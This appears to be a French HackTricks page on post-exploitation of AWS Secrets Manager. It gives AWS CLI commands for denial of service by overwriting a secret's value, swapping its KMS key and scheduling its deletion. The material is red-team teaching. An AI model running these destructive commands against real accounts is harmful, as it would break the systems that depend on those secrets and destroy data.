AWS - Secrets Manager Post Exploitation

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Gestionnaire de Secrets

Pour plus d'informations, consultez :

pageAWS - Secrets Manager Enum

Lire les Secrets

Les secrets eux-mêmes sont des informations sensibles, consultez la page de privilèges pour apprendre à les lire.

DoS - Changer la Valeur du Secret

En changeant la valeur du secret, vous pourriez attaquer par déni de service tous les systèmes qui dépendent de cette valeur.

Notez que les valeurs précédentes sont également stockées, il est donc facile de revenir à la valeur précédente.

```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### Modifier le KMS key DoS ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Suppression de Secret

Le nombre minimum de jours pour supprimer un secret est de 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge HackTricks AWS)!

D'autres façons de soutenir HackTricks:

Dernière mise à jour